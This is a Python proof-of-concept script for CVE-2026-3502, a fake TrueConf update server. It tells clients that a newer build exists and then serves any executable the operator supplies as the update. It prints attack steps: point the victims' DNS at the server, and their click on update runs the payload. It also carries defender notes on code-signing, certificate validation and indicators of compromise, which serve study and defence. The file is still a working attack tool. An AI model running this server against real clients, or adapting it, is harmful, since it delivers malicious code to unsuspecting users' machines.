#!/usr/bin/env python3
"""
CVE-2026-3502 - Fake Update Server

Simulates a compromised TrueConf server that serves malicious updates.

The three routes below reproduce just enough of an update endpoint for a
client to believe a newer build exists and to fetch it. The weakness being
modelled is on the client side -- the downloaded binary is accepted without
any signature or hash verification -- so the server intentionally attaches no
integrity metadata. Defender's view: the effective mitigation is a client-side
code-signature check on the downloaded binary before it is executed, and an
update channel that cannot be redirected by DNS alone (TLS with a pinned or
at least validated certificate). Observable indicators are requests for
/config, /version.js and /downlods/trueconf_client.exe arriving at a host
that is not the organisation's real update server.
"""

from flask import Flask, send_file, request, Response
import argparse
import os
import json
from colorama import init, Fore, Style

init(autoreset=True)
app = Flask(__name__)

# Global configuration. All three are overwritten from the CLI in main()
# before app.run() starts; the handlers read them at request time.
MALICIOUS_UPDATE_PATH = None  # filesystem path of the binary to serve (set by --update)
SERVER_VERSION = "8.5.2"      # advertised (fake) server build
LEGITIMATE_VERSION = "8.5.1"  # build the client is assumed to already have


@app.route('/downlods/trueconf_client.exe')
def serve_malicious_update():
    """Serve the malicious update binary.

    Returns the file at MALICIOUS_UPDATE_PATH as an attachment named
    ``trueconf_client.exe``, or a plain-text "Update not available" with
    status 404 when the path is unset or does not exist on disk.
    """
    # NOTE(review): the path segment is spelled "downlods" (not "downloads")
    # here and in get_config's update_url, so the two are at least consistent;
    # whether it matches what a real client requests is not established by
    # this file.
    if MALICIOUS_UPDATE_PATH and os.path.exists(MALICIOUS_UPDATE_PATH):
        print(f"{Fore.RED}[!] Serving malicious update to {request.remote_addr}{Style.RESET_ALL}")
        # Simulate the absence of integrity verification.
        response = send_file(
            MALICIOUS_UPDATE_PATH,
            as_attachment=True,
            download_name='trueconf_client.exe'
        )
        # No ETag or hash is included (this is the vulnerability being modelled).
        # NOTE(review): Flask's send_file computes an ETag by default, so the
        # header is probably still present despite this comment -- but an ETag
        # is only a cache validator, not an integrity control a client could
        # trust, since this server controls both the body and the header.
        # response.headers['ETag'] = None
        return response
    else:
        print(f"{Fore.RED}[-] Malicious update not found{Style.RESET_ALL}")
        return "Update not available", 404


@app.route('/config')
def get_config():
    """Return the server configuration JSON advertising a fake newer version."""
    # "version" is the advertised server build and "client_version" the build
    # the client is assumed to have; presumably the client compares the two
    # and reports an update -- verify against the real client. update_url
    # points back at serve_malicious_update.
    config = {
        "version": SERVER_VERSION,
        "update_available": True,
        "client_version": LEGITIMATE_VERSION,
        "update_url": "/downlods/trueconf_client.exe"
    }
    return Response(json.dumps(config), mimetype='application/json')


@app.route('/version.js')
def get_version():
    """Return a JavaScript snippet exposing the fake build and version strings."""
    # Both variables carry SERVER_VERSION; the client's consumption of this
    # script is not shown here.
    js_code = f'var build = "{SERVER_VERSION}";\nvar version = "{SERVER_VERSION}";'
    return Response(js_code, mimetype='application/javascript')


@app.route('/')
def index():
    """Landing page showing the advertised version and that this host is a decoy."""
    return """
Version: {}
Status: COMPROMISED - Serving malicious updates
""".format(SERVER_VERSION)


def main():
    """Parse CLI flags, publish them through the module globals, and start Flask.

    Flags:
        --update           path of the binary served by serve_malicious_update (required)
        --port             listening port (default 443)
        --server-version   value advertised as SERVER_VERSION
        --client-version   value advertised as LEGITIMATE_VERSION
    """
    parser = argparse.ArgumentParser(description='CVE-2026-3502 - Fake TrueConf Server')
    parser.add_argument('--update', required=True, help='Path to malicious update EXE')
    parser.add_argument('--port', type=int, default=443, help='Server port')
    parser.add_argument('--server-version', default='8.5.2', help='Fake server version')
    parser.add_argument('--client-version', default='8.5.1', help='Legitimate client version')
    args = parser.parse_args()

    # Publish the CLI values to the module globals the route handlers read.
    global MALICIOUS_UPDATE_PATH, SERVER_VERSION, LEGITIMATE_VERSION
    MALICIOUS_UPDATE_PATH = args.update
    SERVER_VERSION = args.server_version
    LEGITIMATE_VERSION = args.client_version

    print(f"{Fore.RED}╔════════════════════════════════════════════════════════════╗{Style.RESET_ALL}")
    print(f"{Fore.RED}║ CVE-2026-3502 - Fake TrueConf Update Server ║{Style.RESET_ALL}")
    print(f"{Fore.RED}║ Serving malicious updates to vulnerable clients ║{Style.RESET_ALL}")
    print(f"{Fore.RED}╚════════════════════════════════════════════════════════════╝{Style.RESET_ALL}")
    print(f"\n{Fore.CYAN}[*] Server configuration:{Style.RESET_ALL}")
    print(f" Malicious update: {MALICIOUS_UPDATE_PATH}")
    print(f" Server version: {SERVER_VERSION}")
    print(f" Client version (legit): {LEGITIMATE_VERSION}")
    print(f" Port: {args.port}")
    print(f"\n{Fore.YELLOW}[!] Attack simulation:{Style.RESET_ALL}")
    print(f" 1. Configure victims' DNS to point to this server")
    print(f" 2. Victims will see update notification")
    print(f" 3. Clicking update downloads and executes malicious payload")
    print(f"\n{Fore.GREEN}[+] Starting malicious server on port {args.port}...{Style.RESET_ALL}")

    # Run the server (no SSL, for simplicity): plain HTTP even though the
    # default port is 443, bound to every interface.
    # Defender note: this whole scenario rests on redirecting the client to an
    # unauthenticated host. A client that validates the update server's
    # certificate, or verifies a vendor signature on the binary before running
    # it, is not affected by a DNS redirection to a server like this one.
    app.run(host='0.0.0.0', port=args.port, debug=False)


if __name__ == "__main__":
    main()